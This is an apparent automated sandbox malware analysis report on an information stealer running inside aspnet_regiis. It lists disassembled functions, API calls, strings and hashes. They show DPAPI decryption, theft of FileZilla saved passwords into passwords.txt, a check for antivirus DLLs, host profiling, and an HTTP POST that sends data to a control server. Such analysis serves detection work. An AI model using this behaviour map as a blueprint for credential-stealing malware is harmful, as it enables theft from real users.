                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                            • String ID: DPAPI
                                                                                                                            • API String ID: 2068576380-1690256801
                                                                                                                            • Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                            • Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
                                                                                                                            • Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                            • Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90
                                                                                                                            Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 907984538-0
                                                                                                                            • Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                            • Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
                                                                                                                            • Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                            • Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69
                                                                                                                            Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                            • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                            • wsprintfA.USER32 ref: 00410D7D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 362916592-0
                                                                                                                            • Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                            • Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
                                                                                                                            • Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                            • Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785
                                                                                                                            Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                            • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocNameProcessUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1206570057-0
                                                                                                                            • Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                            • Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
                                                                                                                            • Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                            • Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34
                                                                                                                            Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoSystemwsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2452939696-0
                                                                                                                            • Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                            • Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
                                                                                                                            • Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                            • Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44
                                                                                                                            Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1586166983-0
                                                                                                                            • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                            • Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
                                                                                                                            • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                            • Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C
                                                                                                                            Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573stringnetworkmemoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 29 405482-405593 call 4104e7 call 410519 call 404ab6 call 411e5d lstrlenA call 411e5d call 4104e7 * 4 StrCmpCA 48 405595 29->48 49 40559b-4055a1 29->49 48->49 50 4055a3-4055b8 InternetOpenA 49->50 51 4055be-4056ce call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 4105c7 call 410609 call 41058d call 402920 * 3 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 49->51 50->51 52 405e64-405eec call 402920 * 4 call 410519 call 402920 * 3 50->52 51->52 118 4056d4-405712 HttpOpenRequestA 51->118 86 405eee-405f2e call 402920 * 6 call 41d016 52->86 119 405e58-405e5e InternetCloseHandle 118->119 120 405718-40571e 118->120 119->52 121 405720-405736 InternetSetOptionA 120->121 122 40573c-405d77 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 405db5-405dc5 call 411afd 122->309 310 405d79-405db0 call 4104e7 call 402920 * 3 122->310 315 405dcb-405dd0 309->315 316 405f2f 309->316 310->86 318 405e11-405e2e InternetReadFile 315->318 320 405e30-405e43 StrCmpCA 318->320 321 405dd2-405dda 318->321 324 405e45-405e46 ExitProcess 320->324 325 405e4c-405e52 InternetCloseHandle 320->325 321->320 323 405ddc-405e0c call 410609 call 41058d call 402920 321->323 323->318 325->119
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                              • Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                                              • Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                                              • Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                                                            • StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                            • lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,433cd71b7a2bdd3668a493b00ee95630,",build_id,00437814,------), ref: 00405C67
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                                            • _memmove.LIBCMT ref: 00405CB4
                                                                                                                            • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                                            • _memmove.LIBCMT ref: 00405CD6
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                                            • _memmove.LIBCMT ref: 00405D05
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                                            • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                                            • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                                            • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                                            • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                            • String ID: ------$"$"$"$"$--$------$------$------$------$433cd71b7a2bdd3668a493b00ee95630$ERROR$ERROR$block$build_id$file_data
                                                                                                                            • API String ID: 2638065154-1387777635
                                                                                                                            • Opcode ID: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                                                            • Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
                                                                                                                            • Opcode Fuzzy Hash: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                                                            • Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98
                                                                                                                            Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289stringmemoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                              • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                            • strtok_s.MSVCRT ref: 0040E77E
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
                                                                                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E7EA
                                                                                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E829
                                                                                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E862
                                                                                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E89B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040E901
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040E915
                                                                                                                            • lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                            • API String ID: 4146028692-935134978
